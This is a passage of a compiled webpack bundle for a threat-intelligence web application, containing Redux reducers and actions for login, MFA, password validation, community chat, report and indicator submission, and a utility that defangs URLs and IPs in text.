var confirmation = function confirmation() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Confirmation({ visible: false });
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["CONFIRMATION"]:
      return Confirmation(payload);
    default:
      return state;
  }
};

/*
  This can be utilized as a global loading state for the app. Currently it only
  responds to loading data from Redux-Persist.
*/
var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : true;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["INITIALIZE_SUCCESS"]:
      return false;
    default:
      return state;
  }
};

var serialize = function serialize(state) {
  return Object(__WEBPACK_IMPORTED_MODULE_4_trustar_utils__["pickImmutable"])(['options'], state);
};

var initialLoggedInState = window.localStorage.getItem(__WEBPACK_IMPORTED_MODULE_6__constants__["IS_LOGGED_IN_LOCALSTORAGE_KEY"]) !== null;

var isLoggedIn = function isLoggedIn() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : initialLoggedInState;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["DID_LOGIN_VIA_SSO"]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_7__action_types__["CONFIRM_ALIVE_SUCCESS"]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGOUT_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGOUT_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_FAILURE"]:
      return false;
    default:
      return state;
  }
};

var userCredentials = function userCredentials() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : { username: '', password: '' };
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["USER_CREDENTIALS_UPDATE"]:
      return action.payload;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["USER_CREDENTIALS_CLEAR"]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_SUCCESS"]:
      return { username: '', password: '' };
    default:
      return state;
  }
};

var disabledLoginStatusMessage = { message: '', icon: '', level: 'disabled' };

var statusMessage = function statusMessage() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : disabledLoginStatusMessage;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_CLEAR_STATUS_MESSAGE_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_SUCCESS"]:
      return disabledLoginStatusMessage;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_FAILURE"]:
      var _action$payload = action.payload,
          status = _action$payload.status,
          accountLocked = _action$payload.accountLocked;

      // If the request timed out.

      if (status === 0) {
        return {
          message: 'An error occurred. Please try again momentarily or reach out to us at support@trustar.co if this issue persists.',
          level: 'warning'
        };
      }

      if (!__WEBPACK_IMPORTED_MODULE_1_lodash_isnil___default()(accountLocked)) {
        if (accountLocked) {
          return {
            message: '\n              <p>\n                You have tried to enter your credentials too many times. Try again later\n                or click <a class="diff-link" href="/auth/forgot-password">here</a> to reset your password.\n              </p>\n            ',
            level: 'danger'
          };
        }
      }

      return {
        message: '\n          <p>\n            Wrong username and/or password.\n            Try again or click <a class="diff-link" href="/auth/forgot-password">here</a> to reset your password.\n          </p>\n        ',
        level: 'warning'
      };
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["MFA_VERIFY_RESPONSE_FAILURE"]:
      return {
        message: 'Your Multi-Factor Authentication attempt failed. This may be caused by a timeout or invalid credentials. Try again or contact support@trustar.co for further information.',
        level: 'warning'
      };
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["DECLINE_TERMS"]:
      return {
        message: 'You declined the Terms of Use (TOU). Please send an email to support@trustar.co for further information.',
        level: 'warning'
      };
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["FORGOT_PASSWORD_SUCCESS"]:
      return {
        message: 'Password reset instructions have been sent to the email you provided.',
        level: 'success'
      };
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["CHANGE_PASSWORD_FAILURE_BAD_LINK"]:
      return {
        message: 'Your activation link has expired. We sent a new one to your email inbox, please follow the new link activate your account.',
        level: 'warning'
      };
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["CHANGE_PASSWORD_FAILURE_EXPIRED_TOKEN"]:
      return {
        message: action.payload.response.message,
        level: 'warning'
      };
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["CHANGE_PASSWORD_FAILURE"]:
      return {
        message: 'An error occurred. Please reach out to us at support@trustar.co if this issue persists.',
        level: 'warning'
      };
    default:
      return state;
  }
};

var loadingLogin = function loadingLogin() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN"]:
    case __WEBPACK_IMPORTED_MODULE_7__action_types__["CONFIRM_ALIVE"]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_REDIRECT"]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGOUT_SUCCESS"]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGOUT_FAILURE"]:
    case __WEBPACK_IMPORTED_MODULE_7__action_types__["CONFIRM_ALIVE_SUCCESS"]:
      return false;
    default:
      return state;
  }
};

var mfa = function mfa() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_SUCCESS"]:
      return {};
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_REDIRECT"]:
      if (action.payload.state === 'REQUIRES_MFA') {
        return action.payload.mfa;
      }
      return state;
    default:
      return state;
  }
};

var didAcceptTerms = function didAcceptTerms() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["ACCEPT_TERMS_SUCCESS"]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["ACCEPT_TERMS_FAILURE"]:
      return false;
    default:
      return state;
  }
};

var createPasswordAttempt = function createPasswordAttempt() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '';
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["CHANGE_PASSWORD_CREDENTIALS_UPDATE"]:
      return action.payload;
    default:
      return state;
  }
};

var emptyPasswordValidation = {
  all: false,
  min: false,
  max: false,
  uppercase: false,
  lowercase: false,
  digits: false,
  symbols: false
};

var passwordValidation = function passwordValidation() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : emptyPasswordValidation;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["CHANGE_PASSWORD_VALIDATE"]:
      return action.payload;
    default:
      return state;
  }
};

var intendedPath = function intendedPath() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '/';
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["FORCE_LOGIN"]:
      return action.payload;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["LOGIN_SUCCESS"]:
      return '/';
    default:
      return state;
  }
};

var clipboardCopied = function clipboardCopied() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_7__action_types__["CLIPBOARD_COPY"]:
      return payload ? true : false;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_3_redux_immutable__["combineReducers"])({
  timeoutWarning: timeoutWarning,
  serverTimeout: serverTimeout,
  options: options,
  activity: activity,
  routeHistory: routeHistory,
  confirmation: confirmation,
  loading: loading,
  isLoggedIn: isLoggedIn,
  userCredentials: userCredentials,
  statusMessage: statusMessage,
  loadingLogin: loadingLogin,
  mfa: mfa,
  didAcceptTerms: didAcceptTerms,
  createPasswordAttempt: createPasswordAttempt,
  passwordValidation: passwordValidation,
  intendedPath: intendedPath,
  clipboardCopied: clipboardCopied
}));

/***/ }),
/* 1295 */
/***/ (function(module, exports) {

module.exports = {
  error: {
    length: 'Length should be a valid positive number',
    password: 'Password should be a valid string'
  },
  regex: {
    digits: /\d+/,
    letters: /[a-zA-Z]+/,
    uppercase: /[A-Z]+/,
    lowercase: /[a-z]+/,
    symbols: /[`~\!@#\$%\^\&\*\(\)\-_\=\+\[\{\}\]\\\|;:'",<.>\/\?€£¥₹]+/,
    spaces: /[\s]+/
  }
};


/***/ }),
/* 1296 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__actions_js__ = __webpack_require__(1297);
/* unused harmony reexport actions */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__getters_js__ = __webpack_require__(1298);
/* unused harmony reexport getters */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__stores_js__ = __webpack_require__(2902);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_2__stores_js__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__epics_js__ = __webpack_require__(2903);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_3__epics_js__["a"]; });








/***/ }),
/* 1297 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return requestToJoinCommunityChat; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return resetChatModal; });
/* unused harmony export launchCommunityChat */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(706);


// Slack Community Chat Actions
var requestToJoinCommunityChat = function requestToJoinCommunityChat(resendEmail) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["c" /* JOIN_COMMUNITY_CHAT_CHANNEL */],
    payload: resendEmail
  };
};

var resetChatModal = function resetChatModal() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["b" /* CLOSE_CHAT_MODAL */]
  };
};

var launchCommunityChat = function launchCommunityChat() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["d" /* LAUNCH_COMMUNITY_CHAT */]
  };
};

/***/ }),
/* 1298 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return joinRequestInProgress; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return slackInvitationStatus; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_debug__);


var debug = __WEBPACK_IMPORTED_MODULE_1_debug___default()('app:modules:chat:getters'); // eslint-disable-line no-unused-vars

// Slack Community Chat
var joinRequestInProgress = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['chat', 'joinRequestInProgress']);
var slackInvitationStatus = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['chat', 'slackInvitationStatus']);
// END Slack Community Chat

/***/ }),
/* 1299 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export INITIALIZATION_DELAY */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return SLACK_COMMUNITY_CHAT_WORKSPACE_URL; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return USER_STATUSES_FOR_SLACK_COMMUNITY; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ms__ = __webpack_require__(216);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ms___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_ms__);


var INITIALIZATION_DELAY = __WEBPACK_IMPORTED_MODULE_0_ms___default()('5s');
var SLACK_COMMUNITY_CHAT_WORKSPACE_URL = 'https://trustarcommunity.slack.com';

var USER_STATUSES_FOR_SLACK_COMMUNITY = {
  INVITE_SENT: 'INVITE_SENT',
  USER_ALREADY_EXISTS: 'USER_ALREADY_EXISTS',
  USER_ALREADY_INVITED: 'USER_ALREADY_INVITED',
  USER_DISABLED: 'USER_DISABLED',
  DEFAULT: 'DEFAULT',
  ERROR: 'ERROR'
};

/***/ }),
/* 1300 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetch", function() { return fetch; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchWithDefaults", function() { return fetchWithDefaults; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setDisplayOptions", function() { return setDisplayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveCompany", function() { return saveCompany; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteCompany", function() { return deleteCompany; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetQuota", function() { return resetQuota; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(707);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__types_js__ = __webpack_require__(252);





var fetch = function fetch() {
  var payload = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getQueryParams"])();
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* FETCH */],
    payload: payload
  };
};

/**
 * Fetch companies and provide all defaults to the fetch request. This is useful
 * for situations where you just want to specify one option anjd leave the rest
 * to be defaults. Example:
 *
 *    fetchWithDefaults({ query: 'search text' })
 *
 */
var fetchWithDefaults = function fetchWithDefaults() {
  var obj = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* FETCH */],
    payload: Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getQueryParams"])(Object(__WEBPACK_IMPORTED_MODULE_2__types_js__["c" /* Options */])(obj)) // See NOTE
  };
};

var setDisplayOptions = function setDisplayOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["s" /* SET_DISPLAY_OPTIONS */],
    payload: options
  };
};

var saveCompany = function saveCompany(company) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["m" /* SAVE */],
    payload: company
  };
};

var deleteCompany = function deleteCompany(id) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* DELETE */],
    payload: id
  };
};

/**
 * Reset the API request quota for a company by its ID
 */
var resetQuota = function resetQuota(companyGuid, quotaId) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["j" /* RESET_QUOTA */],
    payload: { companyId: companyGuid, quotaId: quotaId }
  };
};

/***/ }),
/* 1301 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return sharingGroupToFormOptions; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__types__ = __webpack_require__(355);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);



var sharingGroupToFormOptions = function sharingGroupToFormOptions(sharingGroup) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["Map"])({
    value: sharingGroup.get('guid'),
    id: sharingGroup.get('guid'),
    label: sharingGroup.get('name')
  });
};

/***/ }),
/* 1302 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sectors", function() { return sectors; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "sector", function() { return sector; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);




var sectors = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['sectors', 'sectors']);
var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['sectors', 'loading']);

var sector = function sector(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(sectors, function (sectors) {
    return sectors.get(id);
  });
};

/***/ }),
/* 1303 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "toggleRedaction", function() { return toggleRedaction; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setStage", function() { return setStage; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setSubmissionType", function() { return setSubmissionType; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "review", function() { return review; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "submitReport", function() { return submitReport; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "submitIndicators", function() { return submitIndicators; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "submitIndicatorsFile", function() { return submitIndicatorsFile; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "update", function() { return update; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "attachFile", function() { return attachFile; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "handleSpreadsheetUpload", function() { return handleSpreadsheetUpload; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "uploadRejected", function() { return uploadRejected; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loadReportData", function() { return loadReportData; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "registerForm", function() { return registerForm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "registerIndicatorsForm", function() { return registerIndicatorsForm; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "teardown", function() { return teardown; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateField", function() { return updateField; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "removeContent", function() { return removeContent; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__constants_js__ = __webpack_require__(561);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(204);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };

var _slicedToArray = function () { function sliceIterator(arr, i) { var _arr = []; var _n = true; var _d = false; var _e = undefined; try { for (var _i = arr[Symbol.iterator](), _s; !(_n = (_s = _i.next()).done); _n = true) { _arr.push(_s.value); if (i && _arr.length === i) break; } } catch (err) { _d = true; _e = err; } finally { try { if (!_n && _i["return"]) _i["return"](); } finally { if (_d) throw _e; } } return _arr; } return function (arr, i) { if (Array.isArray(arr)) { return arr; } else if (Symbol.iterator in Object(arr)) { return sliceIterator(arr, i); } else { throw new TypeError("Invalid attempt to destructure non-iterable instance"); } }; }();



var debug = __WEBPACK_IMPORTED_MODULE_1_debug___default()('app:modules:create:actions'); // eslint-disable-line no-unused-vars





var toggleRedaction = function toggleRedaction() {
  return { type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["TOGGLE_REDACTION"] };
};

var setStage = function setStage(stage) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SET_STAGE"],
    payload: stage
  };
};

var setSubmissionType = function setSubmissionType(type) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SET_SUBMISSION_TYPE"],
    payload: type
  };
};

/* Proceed to Review/Redact stage of report creation */
var review = function review(report) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["REVIEW_REPORT"],
    payload: report
  };
};

/* Submit a report */
var submitReport = function submitReport(report) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_REPORT"],
    payload: report
  };
};

/* Submit indicators */
var submitIndicators = function submitIndicators(values) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_INDICATORS"],
    payload: values
  };
};

/* Submit indicators */
var submitIndicatorsFile = function submitIndicatorsFile(values) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SUBMIT_INDICATORS_FILE"],
    payload: values
  };
};

/* Update a report */
var update = function update(report) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UPDATE_REPORT"],
    payload: report
  };
};

/* Handle attaching a file */
var attachFile = function attachFile(_ref) {
  var _ref2 = _slicedToArray(_ref, 1),
      file = _ref2[0];

  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["ATTACH_FILE"],
    payload: file
  };
};

/* Handle attaching a spreadsheet file intended for
 * specific indicator extraction and parsing */
var handleSpreadsheetUpload = function handleSpreadsheetUpload(_ref3) {
  var _ref4 = _slicedToArray(_ref3, 1),
      file = _ref4[0];

  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["ATTACH_INDICATORS_SPREADSHEET_FILE"],
    payload: file
  };
};

var uploadRejected = function uploadRejected() {
  return { type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["ATTACH_FILE_FAILURE"] };
};

var loadReportData = function loadReportData(guid) {
  var release = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : false;
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["LOAD_REPORT_DATA"],
    payload: { guid: guid, release: release }
  };
};

var getFormEnclaves = function getFormEnclaves(enclaves) {
  return enclaves.map(function (x) {
    return x.get('id');
  }).toList();
};

var registerForm = function registerForm(enclaves) {
  // Initalize the user's enclaves in the form values here:
  var userEnclaves = getFormEnclaves(enclaves);
  var formValues = _extends({}, __WEBPACK_IMPORTED_MODULE_2__constants_js__["d" /* INITIAL_FORM_VALUES */], {
    enclaves: userEnclaves
  });

  // Default distribution type to community if user has no enclaves
  if (formValues.distributionType === 'ENCLAVE' && !userEnclaves.size) {
    // TODO: Should we remove this piece of code?
    formValues.distributionType = 'COMMUNITY';
  }

  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["REGISTER_FORM"],
    payload: { values: formValues }
  };
};

var registerIndicatorsForm = function registerIndicatorsForm(enclaves) {
  // Initalize the user's enclaves in the form values here:
  var userEnclaves = getFormEnclaves(enclaves);
  var formValues = _extends({}, __WEBPACK_IMPORTED_MODULE_2__constants_js__["e" /* INITIAL_INDICATORS_FORM_VALUES */], {
    enclaves: userEnclaves
  });
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["REGISTER_FORM"],
    payload: { values: formValues }
  };
};

var teardown = function teardown() {
  return { type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["UNREGISTER_FORM"] };
};

var updateField = function updateField(keyPath, value) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SET_FIELD_VALUE"],
    payload: { keyPath: keyPath, value: value }
  };
};

/* Reset the 'content' key on our form state map */
var removeContent = function removeContent() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_3__action_types_js__["SET_FIELD_VALUE"],
    payload: {
      keyPath: ['content'],
      value: Object(__WEBPACK_IMPORTED_MODULE_0_immutable__["fromJS"])(__WEBPACK_IMPORTED_MODULE_2__constants_js__["d" /* INITIAL_FORM_VALUES */].content)
    }
  };
};

/***/ }),
/* 1304 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return defang; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return escapeDefangRegex; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_lodash_escaperegexp__ = __webpack_require__(123);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_lodash_escaperegexp___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_lodash_escaperegexp__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_ramda__);




var dangerousPatterns = [
// URL:
/((https?:\/\/)?www\.)?(\S+\.)+(\S+)/,
// IP:
/(\d+\.){3}\d/];

var dotPatterns = '(\\.|\\[\\.\\]|\\(\\.\\)|\\{\\.\\})';

var defang = function defang(text) {
  return dangerousPatterns.reduce(function (cleanString, pattern) {
    return cleanString && __WEBPACK_IMPORTED_MODULE_0_lodash_isstring___default()(cleanString) ? cleanString.replace(RegExp(pattern, 'gi'), function (match) {
      // only put [ ] around .
      return match ? match.replace(/\./g, '[.]').replace(/http/i, 'hxxp').replace(/ftp/i, 'fxp') : match;
      // should find another way to deal with other protocols
    }) : cleanString;
  }, text);
};

/**
 * NOTE: Since we are running replacement on escaped regex we replace the
 * literal '\.' instead of the literal '.'
 */
var matchReplace = Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["pipe"])(Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["replace"])(/\\\./g, dotPatterns), // only put [ ] around ".". See NOTE
Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["replace"])(/http/i, '(http|hxxp)'), Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["replace"])(/ftp/i, '(ftp|fxp)'));

/**
 * NOTE: This needs to be called with an escaped regex string.
 */
var defangRegex = function defangRegex(escapedRegexString) {
  return dangerousPatterns.reduce(function (cleanString, pattern) {
    return cleanString && __WEBPACK_IMPORTED_MODULE_0_lodash_isstring___default()(cleanString) ? cleanString.replace(RegExp(pattern, 'gi'), function (match) {
      return match ? matchReplace(match) : match;
    }) : cleanString;
  }, escapedRegexString);
};

var escapeDefangRegex = Object(__WEBPACK_IMPORTED_MODULE_2_ramda__["pipe"])(__WEBPACK_IMPORTED_MODULE_1_lodash_escaperegexp___default.a, defangRegex);

/***/ }),
/* 1305 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export profile */
/* unused harmony export quotas */
/* unused harmony export loading */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return serialize; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(116);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types_js__ = __webpack_require__(704);










var profile = function profile() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_4__types_js__["d" /* Profile */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["q" /* UPDATE_SUCCESS */]:
